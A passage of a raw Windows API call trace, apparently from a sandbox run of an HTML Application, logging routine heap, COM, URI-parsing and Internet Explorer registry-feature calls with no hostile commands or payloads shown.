RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x128) returned 0x643b90 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x148) returned 0x643cc0 [0066.045] GetCurrentThreadId () returned 0x2a8 [0066.046] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x5c) returned 0x643e10 [0066.046] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x633468 [0066.046] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x18e84c | out: ppURI=0x18e84c*=0x63baa4) returned 0x0 [0066.046] IUri:GetPropertyDWORD (in: This=0x63baa4, 
uriProp=0x11, pdwProperty=0x18e834, dwFlags=0x0 | out: pdwProperty=0x18e834*=0x11) returned 0x0 [0066.046] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x64292c, dwReserved=0x0 | out: ppSM=0x64292c*=0x643e78) returned 0x0 [0066.047] IInternetSecurityManager:SetSecuritySite (This=0x643e78, pSite=0x642934) returned 0x0 [0066.047] IUnknown:AddRef (This=0x642934) returned 0x28 [0066.047] IUnknown:QueryInterface (in: This=0x642934, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18e804 | out: ppvObject=0x18e804*=0x642938) returned 0x0 [0066.047] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x643ea0 | out: ppvObject=0x643ea0*=0x0) returned 0x80004002 [0066.047] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x643e9c | out: ppvObject=0x643e9c*=0x0) returned 0x80004002 [0066.047] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x643e98 | out: ppvObject=0x643e98*=0x0) returned 0x80004002 [0066.047] 
IUnknown:Release (This=0x642938) returned 0x0 [0066.047] IInternetSecurityManager:GetSecurityId (in: This=0x643e78, pwszUrl="about:blank", pbSecurityId=0x18e8a0, pcbSecurityId=0x18e894*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18e8a0*=0x61, pcbSecurityId=0x18e894*=0xf) returned 0x0 [0066.117] DllGetClassObject (in: rclsid=0x640c04*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x18de20*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18d4d8 | out: ppv=0x18d4d8*=0x75028c70) returned 0x0 [0066.117] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.118] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.118] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e09c | out: ppvObject=0x18e09c*=0x75028c70) returned 0x0 [0066.118] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.118] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18e25c | out: ppvObject=0x18e25c*=0x75028c7c) returned 0x0 [0066.118] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.118] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x633528, cchResult=0xc, pcchResult=0x18e2a4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x18e2a4*=0xc) returned 0x0 [0066.118] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644ab0 [0066.118] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.118] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644ab0 | out: hHeap=0x610000) returned 1 [0066.118] 
IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.119] DllGetClassObject (in: rclsid=0x640c04*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e170 | out: ppv=0x18e170*=0x75028c70) returned 0x0 [0066.119] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18e25c | out: ppvObject=0x18e25c*=0x75028c7c) returned 0x0 [0066.119] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.119] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x633528, cchResult=0xc, pcchResult=0x18e2b4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18e2b4*=0x0) returned 0x800c0011 [0066.119] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.119] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.120] IUnknown:Release (This=0x63baa4) returned 0x2 [0066.120] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.120] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xf) returned 0x63f290 [0066.120] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f2c0 [0066.120] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x18e874, dwReserved=0x0 | out: ppSM=0x18e874*=0x646678) returned 0x0 [0066.120] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xf) returned 0x63f308 [0066.121] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x6487c0 [0066.121] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18ea24 | out: 
phkResult=0x18ea24*=0x198) returned 0x0 [0066.121] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18ea28 | out: phkResult=0x18ea28*=0x1a4) returned 0x0 [0066.121] RegOpenKeyExW (in: hKey=0x1a4, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x18e9e4 | out: phkResult=0x18e9e4*=0x0) returned 0x2 [0066.121] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x18e9e4 | out: phkResult=0x18e9e4*=0x0) returned 0x2 [0066.121] RegCloseKey (hKey=0x0) returned 0x6 [0066.121] RegCloseKey (hKey=0x0) returned 0x6 [0066.121] RegCloseKey (hKey=0x198) returned 0x0 [0066.121] RegCloseKey (hKey=0x1a4) returned 0x0 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x128) returned 0x649880 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x648818 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f338 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2000) returned 0x6499b0 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x64b9b8 [0066.122] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64b9b8 | out: hHeap=0x610000) returned 1 [0066.122] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.122] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x18e868 | out: ppURI=0x18e868*=0x63baa4) returned 0x0 [0066.123] DllGetClassObject (in: rclsid=0x640c04*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e140 | out: ppv=0x18e140*=0x75028c70) returned 0x0 [0066.123] 
IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18e22c | out: ppvObject=0x18e22c*=0x75028c7c) returned 0x0 [0066.123] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.123] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x633528, cchResult=0xc, pcchResult=0x18e274, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x18e274*=0xc) returned 0x0 [0066.123] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644ab0 [0066.123] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.124] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644ab0 | out: hHeap=0x610000) returned 1 [0066.124] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.124] DllGetClassObject (in: rclsid=0x640c04*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e140 | out: ppv=0x18e140*=0x75028c70) returned 0x0 [0066.124] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18e22c | out: ppvObject=0x18e22c*=0x75028c7c) returned 0x0 [0066.124] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.124] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x633528, cchResult=0xc, pcchResult=0x18e284, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18e284*=0x0) returned 0x800c0011 [0066.124] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 
1 [0066.124] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.125] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.125] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.125] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.126] IUnknown:Release (This=0x63baa4) returned 0x2 [0066.126] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2c) returned 0x62d750 [0066.126] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x6247b0 [0066.126] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x5c) returned 0x64b9b8 [0066.126] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.126] GetDeviceCaps (hdc=0x1b0101ce, index=88) returned 96 [0066.126] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.126] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0066.127] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18eac0 | out: phkResult=0x18eac0*=0x130) returned 0x0 [0066.127] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18eac4 | out: phkResult=0x18eac4*=0x198) returned 0x0 [0066.127] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x18ea80 | out: phkResult=0x18ea80*=0x0) returned 0x2 [0066.127] RegOpenKeyExW (in: hKey=0x130, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x18ea80 | out: phkResult=0x18ea80*=0x0) returned 0x2 [0066.127] RegCloseKey (hKey=0x0) returned 0x6 [0066.127] RegCloseKey (hKey=0x0) returned 0x6 [0066.127] RegCloseKey (hKey=0x130) returned 0x0 [0066.127] RegCloseKey (hKey=0x198) returned 0x0 [0066.128] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x6249f0 [0066.128] RtlAllocateHeap 
(HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x6293b0 [0066.128] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x5c) returned 0x64ba20 [0066.128] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0066.128] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0066.128] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0066.128] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockShared") returned 0x77c72560 [0066.129] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0066.129] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockShared") returned 0x77c725a9 [0066.129] RtlInitializeConditionVariable () returned 0x64ba54 [0066.129] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x34) returned 0x64ba88 [0066.129] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x34) returned 0x64bac8 [0066.129] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x633528 [0066.129] IUnknown:AddRef (This=0x6421f8) returned 0x0 [0066.129] IUnknown:Release (This=0x6421f8) returned 0x1 [0066.129] IUnknown:Release (This=0x75028cb0) returned 0x1 [0066.129] IUnknown:QueryInterface (in: This=0x6421f8, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f894 | out: ppvObject=0x18f894*=0x6421f8) returned 0x0 [0066.129] IUnknown:Release (This=0x6421f8) returned 0x1 [0066.130] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x62d0c0 [0066.233] IUnknown_QueryService (in: punk=0x750296a4, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, 
[7]=0x74)), ppvOut=0x642250 | out: ppvOut=0x642250*=0x0) returned 0x80004005 [0066.233] IUnknown:QueryInterface (in: This=0x750296a4, riid=0x773042d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18f810 | out: ppvObject=0x18f810*=0x750296b8) returned 0x0 [0066.233] IServiceProvider:QueryService (in: This=0x750296b8, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x642250 | out: ppvObject=0x642250*=0x0) returned 0x80004005 [0066.233] IUnknown:Release (This=0x750296b8) returned 0x1 [0066.233] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x34) returned 0x64bb08 [0066.233] IInternetSecurityManager:SetSecuritySite (This=0x643e78, pSite=0x642934) returned 0x0 [0066.233] IUnknown:Release (This=0x642934) returned 0x0 [0066.233] IUnknown:AddRef (This=0x642934) returned 0x28 [0066.234] IUnknown:QueryInterface (in: This=0x642934, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18f848 | out: ppvObject=0x18f848*=0x642938) returned 0x0 [0066.234] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x643ea0 | out: ppvObject=0x643ea0*=0x0) returned 0x80004002 [0066.234] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, 
Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x643e9c | out: ppvObject=0x643e9c*=0x0) returned 0x80004002 [0066.234] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x643e98 | out: ppvObject=0x643e98*=0x750296bc) returned 0x0 [0066.234] IUnknown:Release (This=0x642938) returned 0x0 [0066.234] CoTaskMemAlloc (cb=0x6d) returned 0x64bb48 [0066.234] CoTaskMemAlloc (cb=0x9) returned 0x63f368 [0066.234] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f380 [0066.234] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x64bbc0 [0066.238] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0066.239] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x44) returned 0x629400 [0066.240] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f398 [0066.240] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f3b0 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x63b940 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x644b28 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x63f3c8 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x94) returned 0x64bc18 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x34) returned 0x64bcb8 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x70) returned 0x64bcf8 [0066.244] RtlAllocateHeap (HeapHandle=0x610000, 
Flags=0x0, Size=0xf8) returned 0x64bd70 [0066.245] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8b4) returned 0x64be70 [0066.245] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f3e0 [0066.245] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.245] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f3f8 [0066.245] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x84) returned 0x64c730 [0066.308] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x800) returned 0x64c7c0 [0066.308] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x800) returned 0x64cfc8 [0066.308] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4c) returned 0x64d7d0 [0066.308] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x800) returned 0x64d828 [0066.309] IsCharSpaceW (wch=0x48) returned 0 [0066.309] IsCharAlphaNumericW (ch=0x5c) returned 0 [0066.309] IsCharSpaceW (wch=0x5c) returned 0 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x18) returned 0x633548 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x64e030 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x633568 [0066.309] IsCharSpaceW (wch=0x41) returned 0 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f410 [0066.309] IsCharAlphaNumericW (ch=0x20) returned 0 [0066.309] IsCharSpaceW (wch=0x20) returned 1 [0066.309] IsCharSpaceW (wch=0x7b) returned 0 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644b50 [0066.309] IsCharSpaceW (wch=0x20) returned 1 [0066.309] IsCharAlphaNumericW (ch=0x7b) returned 0 [0066.309] IsCharSpaceW (wch=0x62) returned 0 [0066.309] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64e030 | out: hHeap=0x610000) returned 1 [0066.309] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.309] IsCharSpaceW (wch=0x3a) returned 0 [0066.309] 
RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644b78 [0066.402] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.402] IsCharSpaceW (wch=0x75) returned 0 [0066.402] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.402] IsCharSpaceW (wch=0x28) returned 0 [0066.402] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.402] IsCharSpaceW (wch=0x23) returned 0 [0066.402] IsCharSpaceW (wch=0x23) returned 0 [0066.402] IsCharSpaceW (wch=0x7d) returned 0 [0066.402] IsCharAlphaNumericW (ch=0x7d) returned 0 [0066.402] IsCharSpaceW (wch=0x29) returned 0 [0066.402] IsCharSpaceW (wch=0x75) returned 0 [0066.402] IsCharSpaceW (wch=0x75) returned 0 [0066.402] IsCharSpaceW (wch=0x29) returned 0 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6335a8 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x34) returned 0x64e238 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x624050 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f428 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f440 [0066.402] CoTaskMemFree (pv=0x64bb48) [0066.402] CoTaskMemFree (pv=0x63f368) [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x6335c8 [0066.403] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0066.403] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0066.403] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0066.403] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x340) returned 0x64e278 [0066.403] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4a) returned 0x64bb48 [0066.403] IsOS (dwOS=0x25) returned 1 [0066.403] GetSysColor (nIndex=26) returned 0xcc6600 [0066.403] IsOS (dwOS=0x25) returned 1 [0066.403] GetSysColor (nIndex=5) returned 0xffffff [0066.403] GetSysColor 
(nIndex=8) returned 0x0 [0066.403] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.404] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f368 [0066.422] wcstol (in: _String="0,0,255", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*=",0,255") returned 0 [0066.422] wcstol (in: _String="0,255", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*=",255") returned 0 [0066.422] wcstol (in: _String="255", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*="") returned 255 [0066.422] wcstol (in: _String="128,0,128", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*=",0,128") returned 128 [0066.422] wcstol (in: _String="0,128", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*=",128") returned 0 [0066.422] wcstol (in: _String="128", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*="") returned 128 [0066.425] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0066.425] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0066.425] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f55c | out: phkResult=0x18f55c*=0xa8) returned 0x0 [0066.425] SHGetValueW (in: hkey=0xa8, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x18f560, 